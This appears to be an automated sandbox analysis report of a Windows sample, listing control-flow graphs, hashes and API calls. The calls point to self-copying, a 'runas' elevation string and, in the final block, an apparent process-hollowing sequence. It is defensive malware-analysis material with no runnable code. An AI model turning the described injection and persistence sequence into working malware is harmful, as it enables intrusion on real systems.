                                                          • Opcode ID: 8038ce904517a86cc19915752ec10024e25c8660399458d5dfb4b262942b5179
                                                          • Instruction ID: 4c34500da4ad4ee1fa56e892ed89410e69d07d0c6dff6010c16861526dd25476
                                                          • Opcode Fuzzy Hash: 8038ce904517a86cc19915752ec10024e25c8660399458d5dfb4b262942b5179
                                                          • Instruction Fuzzy Hash: C601AC75765311ABEB31AFB4ED0DA5A76D8EB46B51B150422F900D29E0FBB0C9C08F71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00192368: CreateFileW.KERNELBASE(00000000,00000000,?,00192758,?,?,00000000,?,00192758,00000000,0000000C), ref: 00192385
                                                          • GetLastError.KERNEL32 ref: 001927C3
                                                          • __dosmaperr.LIBCMT ref: 001927CA
                                                          • GetFileType.KERNELBASE(00000000), ref: 001927D6
                                                          • GetLastError.KERNEL32 ref: 001927E0
                                                          • __dosmaperr.LIBCMT ref: 001927E9
                                                          • CloseHandle.KERNEL32(00000000), ref: 00192809
                                                          • CloseHandle.KERNEL32(0018D4F0), ref: 00192956
                                                          • GetLastError.KERNEL32 ref: 00192988
                                                          • __dosmaperr.LIBCMT ref: 0019298F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: 09b9a74620760f1c6ea0423479f2eae8c51e3f5cd439e4c4a68f31719f8e0ed8
                                                          • Instruction ID: a7e0daa74076db65fa0163383c36829ad4e7958ba920ea8478217a901008953d
                                                          • Opcode Fuzzy Hash: 09b9a74620760f1c6ea0423479f2eae8c51e3f5cd439e4c4a68f31719f8e0ed8
                                                          • Instruction Fuzzy Hash: 79A10532A04154AFCF19EF68DC91BAE3BE1AB5A324F140159F811AF3A2CB349D56CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetTempPathA.KERNEL32(00000104,?), ref: 00179C90
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: PathTemp
                                                          • String ID:
                                                          • API String ID: 2920410445-0
                                                          • Opcode ID: f7ed4eaf9d271da913040abb991491821bc763d0c9e4be96e95b412f4821efa7
                                                          • Instruction ID: 82df81ab4a64eaf81f4da53c4b1df265ca30b3a623d301975c2de80386f22576
                                                          • Opcode Fuzzy Hash: f7ed4eaf9d271da913040abb991491821bc763d0c9e4be96e95b412f4821efa7
                                                          • Instruction Fuzzy Hash: FAA18FB0A002588BEF24DB24CC547DDB7B5AB55304F9045D8E60D67282DB715FC8CF6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 161 173ff0-174050 call 1862f0 call 186070 166 174052-17405e 161->166 167 17407e-1740fa call 185ac0 * 2 call 172ce0 call 185e20 call 173b10 161->167 169 174074-17407b call 187684 166->169 170 174060-17406e 166->170 192 1740fc-174108 167->192 193 174128-17412e 167->193 169->167 170->169 172 1741b7 call 18bcdc 170->172 177 1741bc-17428a call 18bcdc call 185ac0 call 172ce0 call 186070 call 185ac0 call 172ce0 call 185e20 call 173b10 172->177 222 1742b4-1742c5 Sleep 177->222 223 17428c-174298 177->223 197 17411e-174125 call 187684 192->197 198 17410a-174118 192->198 194 174130-17413c 193->194 195 174158-174170 193->195 199 17414e-174155 call 187684 194->199 200 17413e-17414c 194->200 201 174172-17417e 195->201 202 17419a-1741b6 call 187012 195->202 197->193 198->177 198->197 199->195 200->177 200->199 207 174190-174197 call 187684 201->207 208 174180-17418e 201->208 207->202 208->177 208->207 226 1742c7-1742d3 222->226 227 1742ef-174308 call 187012 222->227 224 1742aa-1742b1 call 187684 223->224 225 17429a-1742a8 223->225 224->222 225->224 229 174309 call 18bcdc 225->229 231 1742e5-1742ec call 187684 226->231 232 1742d5-1742e3 226->232 236 17430e-17435f call 18bcdc call 173740 229->236 231->227 232->231 232->236 243 174363-174370 SetCurrentDirectoryA 236->243 244 174361 236->244 245 174372-17437e 243->245 246 17439e-174458 call 185ac0 call 172ce0 call 185ac0 call 172ce0 call 186070 call 185f70 call 185ac0 call 172ce0 call 185e20 call 173b10 243->246 244->243 248 174394-17439b call 187684 245->248 249 174380-17438e 245->249 278 174486-17449e 246->278 279 17445a-174466 246->279 248->246 249->248 251 174558 call 18bcdc 249->251 256 17455d call 18bcdc 251->256 260 174562-174567 call 18bcdc 256->260 282 1744a0-1744ac 278->282 283 1744cc-1744e4 278->283 280 17447c-174483 call 187684 279->280 281 174468-174476 279->281 280->278 281->256 281->280 287 1744c2-1744c9 call 187684 282->287 288 1744ae-1744bc 282->288 284 1744e6-1744f2 283->284 285 17450e-174514 283->285 289 174504-17450b call 187684 284->289 290 1744f4-174502 284->290 291 174516-174522 285->291 292 17453e-174557 call 187012 285->292 287->283 288->256 288->287 289->285 290->256 290->289 296 174534-17453b call 187684 291->296 297 174524-174532 291->297 296->292 297->260 297->296
                                                          APIs
                                                          • Sleep.KERNEL32(000003E8), ref: 001742B9
                                                          • SetCurrentDirectoryA.KERNEL32(00000000,5D32641E), ref: 00174364
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentDirectorySleep
                                                          • String ID: runas
                                                          • API String ID: 16921501-4000483414
                                                          • Opcode ID: 29d85a786182366578239b8aaa335b84b256e342ceb04bc712836cc483c0c9b2
                                                          • Instruction ID: 149faa0da7ca45f04c88ba660ab86d5e5f8a8dd5394296229e564deaf63e55c5
                                                          • Opcode Fuzzy Hash: 29d85a786182366578239b8aaa335b84b256e342ceb04bc712836cc483c0c9b2
                                                          • Instruction Fuzzy Hash: 23E12A71A001449BEB08FB78CD867ADBB72EF56314F60825CF415AB3C6DB359B448B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 304 17a032-17a034 305 17a036-17a04d CreateDirectoryA 304->305 306 17a053-17a06d GetFileAttributesA 304->306 305->306 307 17a077-17a08c 306->307 308 17a06f-17a071 306->308 311 17a0bf-17a0e3 307->311 312 17a08e-17a099 307->312 308->307 309 17a18b-17a1b8 call 1859a0 * 2 CopyFileA call 175120 308->309 340 17a1ba-17a206 call 185a80 call 185ac0 call 185a80 call 173b10 309->340 341 17a209-17a20b call 18aa9f 309->341 316 17a0e5-17a0f0 311->316 317 17a110-17a134 311->317 314 17a0af-17a0bc call 187684 312->314 315 17a09b-17a0a9 312->315 314->311 315->314 321 17a210-17a215 call 18bcdc 315->321 323 17a106-17a10d call 187684 316->323 324 17a0f2-17a100 316->324 319 17a136-17a145 317->319 320 17a165-17a180 call 187012 317->320 326 17a147-17a155 319->326 327 17a15b-17a162 call 187684 319->327 323->317 324->321 324->323 326->321 326->327 327->320 340->341 341->321
                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 0017A04D
                                                          • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 0017A068
                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0017A1A5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AttributesCopyCreateDirectory
                                                          • String ID:
                                                          • API String ID: 210682061-0
                                                          • Opcode ID: 44c6c4d10d376de3a6fd215531746938623d01c86cea7431af4891a5eebf30d8
                                                          • Instruction ID: 468c96f2918aa3acb6eaa8c354a988e4f01a77672ac63a490003a80888c651a4
                                                          • Opcode Fuzzy Hash: 44c6c4d10d376de3a6fd215531746938623d01c86cea7431af4891a5eebf30d8
                                                          • Instruction Fuzzy Hash: 2E41D5B1A001188BEF14EB28CC9979CB775AF55314FA045D8E60DA72C3DB316BC48F6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00179EB5
                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0017A1A5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CopyModuleName
                                                          • String ID:
                                                          • API String ID: 4108865673-0
                                                          • Opcode ID: 1512e962389bd3692438b842997ffa96aa7154ba35a473728f51e3eb5a0ab927
                                                          • Instruction ID: b67c3ca01ea8d0345545101f5709573d2f7d70939b7dda7b63db2e0ada926fde
                                                          • Opcode Fuzzy Hash: 1512e962389bd3692438b842997ffa96aa7154ba35a473728f51e3eb5a0ab927
                                                          • Instruction Fuzzy Hash: B5C12AB1A001148BEF24EB28CC9579DBB359F91314F9482D8E54DA72C2DB319FC98F66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 437 18c25d-18c264 438 18c269-18c270 call 1906b4 call 190a55 437->438 439 18c266-18c268 437->439 443 18c275-18c279 438->443 444 18c27b-18c27e 443->444 445 18c280-18c289 call 18c2b0 443->445 446 18c2a4-18c2af call 18d653 444->446 450 18c28b-18c28e 445->450 451 18c290-18c297 445->451 453 18c29c-18c2a3 call 18d653 450->453 451->453 453->446
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: ffc54b5fc3c939f69b1d86795911733ef47c381ce59a5bc54a2ac1148f95d5d0
                                                          • Instruction ID: 03bb88866536d5173aa3e8e1cc99b40f128f074f787a5ba0cc4823efb060e6b3
                                                          • Opcode Fuzzy Hash: ffc54b5fc3c939f69b1d86795911733ef47c381ce59a5bc54a2ac1148f95d5d0
                                                          • Instruction Fuzzy Hash: A7E0E522505A1155D61276B97C0166E23829B92734B214326F428C64D0DF304A818FF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 456 185e20-185e3c 457 185e3e-185e43 456->457 458 185e64-185e6a 456->458 459 185e45 457->459 460 185e47-185e61 call 189bb0 457->460 461 185f4e call 1869f0 458->461 462 185e70-185e7b 458->462 459->460 468 185f53-185f58 call 172150 461->468 465 185e7d-185e82 462->465 466 185e84-185e91 462->466 469 185ea2-185eb6 465->469 470 185e9a-185e9f 466->470 471 185e93-185e98 466->471 473 185eb8-185ebd 469->473 474 185edd-185edf 469->474 470->469 471->469 473->468 478 185ec3-185ed0 call 187403 473->478 475 185eec 474->475 476 185ee1-185ee2 call 187403 474->476 481 185eee-185f11 call 18a270 475->481 483 185ee7-185eea 476->483 485 185f49 call 18bcdc 478->485 486 185ed2-185edb 478->486 489 185f3c-185f46 481->489 490 185f13-185f1e 481->490 483->481 485->461 486->481 491 185f20-185f2e 490->491 492 185f32-185f39 call 187684 490->492 491->485 493 185f30 491->493 492->489 493->492
                                                          APIs
                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00185F53
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::cancel_current_task
                                                          • String ID:
                                                          • API String ID: 118556049-0
                                                          • Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                          • Instruction ID: f170c128de9823f8aa0d2d95b118d5dad3dbbf8bc7989f88baf1c15d290cf101
                                                          • Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                          • Instruction Fuzzy Hash: 5B31E371A046009BD728BE789C8196EFBAAEF54320B24436EE965C7382D7709F458F91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 496 187403-187406 497 187415-187418 call 18bd2d 496->497 499 18741d-187420 497->499 500 187408-187413 call 18bd47 499->500 501 187422-187423 499->501 500->497 504 187424-187428 500->504 505 18742e-187afb call 186e6f call 188483 504->505 506 172150-1721a0 call 172130 call 188483 call 188248 504->506
                                                          APIs
                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 0017218E
                                                            • Part of subcall function 00188483: RaiseException.KERNEL32(E06D7363,00000001,00000003,0017216C,?,?,?,0017216C,?,001A6D1C), ref: 001884E3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise___std_exception_copy
                                                          • String ID:
                                                          • API String ID: 3109751735-0
                                                          • Opcode ID: fee38084ac33ab21416981971373772d88555ef1f14fb6e05a9b33cc2d43aedb
                                                          • Instruction ID: 3de7d9aea874a26871f5c8f0f5782fd0c901e6f3ae1aac3be54a21c4a34b67c0
                                                          • Opcode Fuzzy Hash: fee38084ac33ab21416981971373772d88555ef1f14fb6e05a9b33cc2d43aedb
                                                          • Instruction Fuzzy Hash: 6801267580420D77CB14FAE8EC419997BACDF10314B648621FA14A7181FBB0EB44CFD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 518 18d4b1-18d4d7 call 18d287 521 18d4d9-18d4eb call 19268f 518->521 522 18d530-18d533 518->522 524 18d4f0-18d4f5 521->524 524->522 525 18d4f7-18d52f 524->525
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          • API String ID: 3347428461-0
                                                          • Opcode ID: 02f53fffad1f7b397d43658a05786445c31fa97e6ea7f8e60c36c2d816c2be84
                                                          • Instruction ID: 97dbd7e5cd7e916e921953fcb89b8444b9537b813ba926b81d3841828ff81c64
                                                          • Opcode Fuzzy Hash: 02f53fffad1f7b397d43658a05786445c31fa97e6ea7f8e60c36c2d816c2be84
                                                          • Instruction Fuzzy Hash: 58111871A0420AAFCF09DF98E941D9B7BF5EF49304F054059F805AB251E770EA11CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 526 18ed56-18ed63 call 18f925 528 18ed68-18ed73 526->528 529 18ed79-18ed81 528->529 530 18ed75-18ed77 528->530 531 18edc4-18edd0 call 18d653 529->531 532 18ed83-18ed87 529->532 530->531 533 18ed89-18edbe call 18e503 532->533 538 18edc0-18edc3 533->538 538->531
                                                          APIs
                                                            • Part of subcall function 0018F925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0018E0E6,00000001,00000364,00000006,000000FF,?,?,00188272,?), ref: 0018F966
                                                          • _free.LIBCMT ref: 0018EDC5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                          • Instruction ID: 5b1aaec5da065aa3bde100db5619a4a7fafa96cf69f7b0c3d990e68e973aacaa
                                                          • Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                          • Instruction Fuzzy Hash: 23014972604316ABC320AF99D88599EFBD8EB053B0F11072AF455A76C0E7706E14CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 539 192621-192655 call 18add0 call 18ad30 544 19265c-192671 call 1926af 539->544 545 192657-19265a 539->545 548 192676-192679 544->548 547 19267b-19267f 545->547 549 19268a-19268e 547->549 550 192681-192689 call 18d653 547->550 548->547 550->549
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                          • Instruction ID: 220b024a5430d925be70ae50a670afcea26d6d01352108c0b288b364c8f0b971
                                                          • Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                          • Instruction Fuzzy Hash: B1014F72C00159BFCF01AFE89C01AEE7FB5AF18310F144166FD14E2191E7318A60DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 553 18f925-18f930 554 18f93e-18f944 553->554 555 18f932-18f93c 553->555 557 18f95d-18f96e RtlAllocateHeap 554->557 558 18f946-18f947 554->558 555->554 556 18f972-18f97d call 18b7f0 555->556 562 18f97f-18f981 556->562 559 18f949-18f950 call 18ccd1 557->559 560 18f970 557->560 558->557 559->556 566 18f952-18f95b call 18bd47 559->566 560->562 566->556 566->557
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0018E0E6,00000001,00000364,00000006,000000FF,?,?,00188272,?), ref: 0018F966
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: cf7394bdb5f87271a4db9ab60c120c0a495cc1baacec06f98cc30baaf7db7742
                                                          • Instruction ID: 6b2d630ab73d6048dc6bcfdf3b026f780564422faa01302877df4bb851c6be78
                                                          • Opcode Fuzzy Hash: cf7394bdb5f87271a4db9ab60c120c0a495cc1baacec06f98cc30baaf7db7742
                                                          • Instruction Fuzzy Hash: DDF0B431A55324B69B217E268C45B5B3788AF51778B15813AF814AA190CB30DE028FF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 569 18db3c-18db48 570 18db7a-18db85 call 18b7f0 569->570 571 18db4a-18db4c 569->571 579 18db87-18db89 570->579 572 18db4e-18db4f 571->572 573 18db65-18db76 RtlAllocateHeap 571->573 572->573 575 18db78 573->575 576 18db51-18db58 call 18ccd1 573->576 575->579 576->570 581 18db5a-18db63 call 18bd47 576->581 581->570 581->573
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00188272,?,?,?,?,?,001720C3,?,?), ref: 0018DB6E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: e29ace123e6c6871c0d0a1baca146dbc98896e1205995caf6b92867cc1d589ac
                                                          • Instruction ID: 9046275cc8f73b5129558c6d293a80e6279789381b422343e494a616ec9543a2
                                                          • Opcode Fuzzy Hash: e29ace123e6c6871c0d0a1baca146dbc98896e1205995caf6b92867cc1d589ac
                                                          • Instruction Fuzzy Hash: 52E06D3164432167DA213666BC01B9B3B98AF533B1F1B0125FC199A2D0CB60DE408FE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00192758,?,?,00000000,?,00192758,00000000,0000000C), ref: 00192385
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 2b3e3453b7f48f571e84b5e3ac404a8b73ba4537230cac7bc07a6b2792aba9ed
                                                          • Instruction ID: e373011d8e74e797646891f33c7a3adb73f601fd64beee67aada991b3783da0e
                                                          • Opcode Fuzzy Hash: 2b3e3453b7f48f571e84b5e3ac404a8b73ba4537230cac7bc07a6b2792aba9ed
                                                          • Instruction Fuzzy Hash: 71D06C3200010DBBDF028F84ED46EDA3FAAFB48714F014010BA1856020C732E861AB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 001738E6
                                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0017394B
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00173964
                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 0017397F
                                                          • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 001739A3
